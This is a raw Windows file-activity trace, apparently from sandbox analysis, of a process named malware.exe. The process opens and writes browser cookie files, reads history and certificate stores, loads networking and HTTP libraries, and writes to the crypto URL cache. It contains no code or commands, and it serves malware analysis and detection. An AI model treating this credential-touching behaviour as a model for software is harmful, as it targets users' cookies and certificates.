29/2/2020 - 1:46:49.215Open1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies
29/2/2020 - 1:46:49.215Open1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies
29/2/2020 - 1:46:49.215Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies
29/2/2020 - 1:46:49.215Open1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies
29/2/2020 - 1:46:49.215Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies
29/2/2020 - 1:46:49.215Open1480C:\malware.exeC:\Users\Behemot
29/2/2020 - 1:46:49.215Open1480C:\malware.exeC:\Users\Behemot
29/2/2020 - 1:46:49.215Unknown1480C:\malware.exeC:\Users\Behemot
29/2/2020 - 1:46:49.215Open1480C:\malware.exeC:\Users\Behemot\AppData\Local
29/2/2020 - 1:46:49.215Open1480C:\malware.exeC:\Users\Behemot\AppData\Local
29/2/2020 - 1:46:49.215Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Local
29/2/2020 - 1:46:49.215Open1480C:\malware.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\History
29/2/2020 - 1:46:49.215Open1480C:\malware.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\History
29/2/2020 - 1:46:49.215Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\History
29/2/2020 - 1:46:49.215Open1480C:\malware.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\History\History.IE5
29/2/2020 - 1:46:49.215Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\History\History.IE5
29/2/2020 - 1:46:49.278Open1480C:\malware.exeC:\Windows\SysWOW64\netprofm.dll
29/2/2020 - 1:46:49.278Open1480C:\malware.exeC:\Windows\SysWOW64\netprofm.dll
29/2/2020 - 1:46:49.278Open1480C:\malware.exeC:\Windows\SysWOW64\nlaapi.dll
29/2/2020 - 1:46:49.278Open1480C:\malware.exeC:\Windows\SysWOW64\nlaapi.dll
29/2/2020 - 1:46:49.325Open1480C:\malware.exeC:\dhcpcsvc6.DLL
29/2/2020 - 1:46:49.325Open1480C:\malware.exeC:\Windows\SysWOW64\dhcpcsvc6.dll
29/2/2020 - 1:46:49.325Unknown1480C:\malware.exeC:\Windows\SysWOW64\dhcpcsvc6.dlldhcpcsvc6.dll
29/2/2020 - 1:46:49.325Open1480C:\malware.exeC:\Windows\SysWOW64\dhcpcsvc6.dll
29/2/2020 - 1:46:49.325Unknown1480C:\malware.exeC:\Windows\SysWOW64\dhcpcsvc6.dlldhcpcsvc6.dll
29/2/2020 - 1:46:49.325Open1480C:\malware.exeC:\MSHTML.dll
29/2/2020 - 1:46:49.325Open1480C:\malware.exeC:\Windows\SysWOW64\mshtml.dll
29/2/2020 - 1:46:49.325Open1480C:\malware.exeC:\Windows\SysWOW64\mshtml.dll
29/2/2020 - 1:46:49.325Read1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dllMicrosoft.VisualBasic.dll
29/2/2020 - 1:46:49.340Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:46:49.340Open1480C:\malware.exeC:\Windows\SysWOW64\ole32.dll
29/2/2020 - 1:46:49.340Open1480C:\malware.exeC:\Windows\SysWOW64\ole32.dll
29/2/2020 - 1:46:49.340Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:49.340Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:49.340Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:49.387Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:49.387Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:49.387Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:49.387Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:49.387Open1480C:\malware.exeC:\Windows\SysWOW64\WSHTCPIP.DLL
29/2/2020 - 1:46:49.387Open1480C:\malware.exeC:\Windows\SysWOW64\WSHTCPIP.DLL
29/2/2020 - 1:46:49.387Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:49.387Open1480C:\malware.exeC:\dhcpcsvc.DLL
29/2/2020 - 1:46:49.387Open1480C:\malware.exeC:\Windows\SysWOW64\dhcpcsvc.dll
29/2/2020 - 1:46:49.387Open1480C:\malware.exeC:\Windows\SysWOW64\dhcpcsvc.dll
29/2/2020 - 1:46:49.387Open1480C:\malware.exeC:\Windows\SysWOW64\npmproxy.dll
29/2/2020 - 1:46:49.387Open1480C:\malware.exeC:\Windows\SysWOW64\npmproxy.dll
29/2/2020 - 1:46:49.434Open1480C:\malware.exeC:\rasadhlp.dll
29/2/2020 - 1:46:49.434Open1480C:\malware.exeC:\Windows\SysWOW64\rasadhlp.dll
29/2/2020 - 1:46:49.434Open1480C:\malware.exeC:\Windows\SysWOW64\rasadhlp.dll
29/2/2020 - 1:46:49.668Open1480C:\malware.exeC:\Windows\SysWOW64\FWPUCLNT.DLL
29/2/2020 - 1:46:49.668Open1480C:\malware.exeC:\Windows\SysWOW64\FWPUCLNT.DLL
29/2/2020 - 1:46:49.762Open1480C:\malware.exeC:\malware.exe.Local
29/2/2020 - 1:46:49.762Open1480C:\malware.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d
29/2/2020 - 1:46:49.762Unknown1480C:\malware.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d
29/2/2020 - 1:46:49.762Open1480C:\malware.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d
29/2/2020 - 1:46:49.762Open1480C:\malware.exeC:\Windows\SysWOW64\ws2_32.dll
29/2/2020 - 1:46:49.762Open1480C:\malware.exeC:\Windows\SysWOW64\ws2_32.dll
29/2/2020 - 1:46:49.762Open1480C:\malware.exeC:\Windows\SysWOW64\WSHTCPIP.DLL
29/2/2020 - 1:46:49.762Open1480C:\malware.exeC:\Windows\SysWOW64\WSHTCPIP.DLL
29/2/2020 - 1:46:49.762Open1480C:\malware.exeC:\Windows\SysWOW64\WSHTCPIP.DLL
29/2/2020 - 1:46:49.762Open1480C:\malware.exeC:\Windows\SysWOW64\wship6.dll
29/2/2020 - 1:46:49.762Open1480C:\malware.exeC:\Windows\SysWOW64\wship6.dll
29/2/2020 - 1:46:49.762Open1480C:\malware.exeC:\Windows\SysWOW64\wship6.dll
29/2/2020 - 1:46:49.762Open1480C:\malware.exeC:\Windows\SysWOW64\wshqos.dll
29/2/2020 - 1:46:49.762Open1480C:\malware.exeC:\Windows\SysWOW64\wshqos.dll
29/2/2020 - 1:46:49.762Open1480C:\malware.exeC:\Windows\SysWOW64\wshqos.dll
29/2/2020 - 1:46:49.762Open1480C:\malware.exeC:\Windows\SysWOW64\wshqos.dll
29/2/2020 - 1:46:49.762Open1480C:\malware.exeC:\Windows\SysWOW64\wshqos.dll
29/2/2020 - 1:46:49.762Open1480C:\malware.exeC:\Windows\SysWOW64\wshqos.dll
29/2/2020 - 1:46:49.762Open1480C:\malware.exeC:\Windows\SysWOW64\wshqos.dll
29/2/2020 - 1:46:49.762Open1480C:\malware.exeC:\Windows\SysWOW64\wshqos.dll
29/2/2020 - 1:46:49.840Open1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies
29/2/2020 - 1:46:49.840Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies
29/2/2020 - 1:46:49.840Open1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\BNF7CK3S.txt
29/2/2020 - 1:46:49.840Open1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\BNF7CK3S.txt
29/2/2020 - 1:46:49.840Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\BNF7CK3S.txt
29/2/2020 - 1:46:49.840Open1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\BNF7CK3S.txt
29/2/2020 - 1:46:49.840Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\BNF7CK3S.txt
29/2/2020 - 1:46:49.840Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\BNF7CK3S.txt
29/2/2020 - 1:46:49.840Write1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\BNF7CK3S.txt
29/2/2020 - 1:46:49.903Open1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies
29/2/2020 - 1:46:49.903Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies
29/2/2020 - 1:46:49.903Open1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\GGJ30VTU.txt
29/2/2020 - 1:46:49.903Open1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\GGJ30VTU.txt
29/2/2020 - 1:46:49.903Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\GGJ30VTU.txt
29/2/2020 - 1:46:49.903Open1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\GGJ30VTU.txt
29/2/2020 - 1:46:49.903Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\GGJ30VTU.txt
29/2/2020 - 1:46:49.903Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\GGJ30VTU.txt
29/2/2020 - 1:46:49.903Write1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\GGJ30VTU.txt
29/2/2020 - 1:46:49.903Write1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\GGJ30VTU.txt
29/2/2020 - 1:46:49.903Write1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\GGJ30VTU.txt
29/2/2020 - 1:46:49.903Open1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates
29/2/2020 - 1:46:49.903Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates
29/2/2020 - 1:46:49.903Open1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs
29/2/2020 - 1:46:49.903Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs
29/2/2020 - 1:46:49.903Open1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs
29/2/2020 - 1:46:49.903Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs
29/2/2020 - 1:46:50.75Open1480C:\malware.exeC:\credssp.dll
29/2/2020 - 1:46:50.75Open1480C:\malware.exeC:\Windows\SysWOW64\credssp.dll
29/2/2020 - 1:46:50.75Open1480C:\malware.exeC:\Windows\SysWOW64\credssp.dll
29/2/2020 - 1:46:50.75Open1480C:\malware.exeC:\Windows\SysWOW64\schannel.dll
29/2/2020 - 1:46:50.75Open1480C:\malware.exeC:\Windows\SysWOW64\schannel.dll
29/2/2020 - 1:46:50.75Open1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My
29/2/2020 - 1:46:50.75Open1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates
29/2/2020 - 1:46:50.75Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates
29/2/2020 - 1:46:50.75Open1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs
29/2/2020 - 1:46:50.75Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs
29/2/2020 - 1:46:50.75Open1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs
29/2/2020 - 1:46:50.75Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs
29/2/2020 - 1:46:50.153Open1480C:\malware.exeC:\cryptnet.dll
29/2/2020 - 1:46:50.153Open1480C:\malware.exeC:\Windows\SysWOW64\cryptnet.dll
29/2/2020 - 1:46:50.153Open1480C:\malware.exeC:\Windows\SysWOW64\cryptnet.dll
29/2/2020 - 1:46:50.168Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:50.168Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:50.168Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:50.168Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:50.168Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
29/2/2020 - 1:46:50.168Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
29/2/2020 - 1:46:50.168Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:50.168Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:50.168Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:50.168Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:50.168Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
29/2/2020 - 1:46:50.168Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:50.168Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:50.168Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:50.168Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:50.168Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0574EE8_5FA8E5E800867BF860DF5E533E701BAF
29/2/2020 - 1:46:50.168Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:50.168Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:50.168Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:50.168Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:50.168Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\85B3F147E3624A14E6A20DB4F6C2C5D9
29/2/2020 - 1:46:50.168Open1480C:\malware.exeC:\SensApi.dll
29/2/2020 - 1:46:50.168Open1480C:\malware.exeC:\Windows\SysWOW64\SensApi.dll
29/2/2020 - 1:46:50.168Open1480C:\malware.exeC:\Windows\SysWOW64\SensApi.dll
29/2/2020 - 1:46:50.184Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:50.184Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:50.184Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:50.184Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:50.184Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
29/2/2020 - 1:46:50.184Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
29/2/2020 - 1:46:50.231Open1480C:\malware.exeC:\WINHTTP.dll
29/2/2020 - 1:46:50.231Open1480C:\malware.exeC:\Windows\SysWOW64\winhttp.dll
29/2/2020 - 1:46:50.231Open1480C:\malware.exeC:\Windows\SysWOW64\winhttp.dll
29/2/2020 - 1:46:50.231Open1480C:\malware.exeC:\webio.dll
29/2/2020 - 1:46:50.231Open1480C:\malware.exeC:\Windows\SysWOW64\webio.dll
29/2/2020 - 1:46:50.231Open1480C:\malware.exeC:\Windows\SysWOW64\webio.dll
29/2/2020 - 1:46:50.418Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:50.418Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:50.418Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:50.418Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:50.418Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
29/2/2020 - 1:46:50.700Open1480C:\malware.exeC:\Windows\SysWOW64\wininet.dll
29/2/2020 - 1:46:50.700Open1480C:\malware.exeC:\Windows\SysWOW64\wininet.dll
29/2/2020 - 1:46:51.387Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.387Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.387Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.387Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.387Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
29/2/2020 - 1:46:51.387Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
29/2/2020 - 1:46:51.387Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
29/2/2020 - 1:46:51.387Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
29/2/2020 - 1:46:51.387Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
29/2/2020 - 1:46:51.387Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content
29/2/2020 - 1:46:51.387Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content
29/2/2020 - 1:46:51.387Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content
29/2/2020 - 1:46:51.387Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content
29/2/2020 - 1:46:51.387Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
29/2/2020 - 1:46:51.387Write1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288BCFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
29/2/2020 - 1:46:51.387Write1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288BCFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
29/2/2020 - 1:46:51.387Write1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288BCFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
29/2/2020 - 1:46:51.387Write1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288BCFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
29/2/2020 - 1:46:51.387Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288BCFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
29/2/2020 - 1:46:51.387Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288BCFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
29/2/2020 - 1:46:51.387Write1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288BCFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
29/2/2020 - 1:46:51.387Write1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288BCFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
29/2/2020 - 1:46:51.387Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288BCFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
29/2/2020 - 1:46:51.387Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288BCFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
29/2/2020 - 1:46:51.387Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.387Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.387Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.387Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.387Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
29/2/2020 - 1:46:51.387Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
29/2/2020 - 1:46:51.387Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
29/2/2020 - 1:46:51.387Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
29/2/2020 - 1:46:51.387Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
29/2/2020 - 1:46:51.387Read1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288BCFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
29/2/2020 - 1:46:51.387Read1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288BCFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
29/2/2020 - 1:46:51.387Read1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288BCFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
29/2/2020 - 1:46:51.387Write1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288BCFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
29/2/2020 - 1:46:51.387Write1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288BCFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
29/2/2020 - 1:46:51.387Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288BCFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
29/2/2020 - 1:46:51.387Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288BCFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
29/2/2020 - 1:46:51.387Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288BCFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
29/2/2020 - 1:46:51.387Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.387Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.387Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.387Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.387Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
29/2/2020 - 1:46:51.387Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
29/2/2020 - 1:46:51.387Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.387Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.387Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.387Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
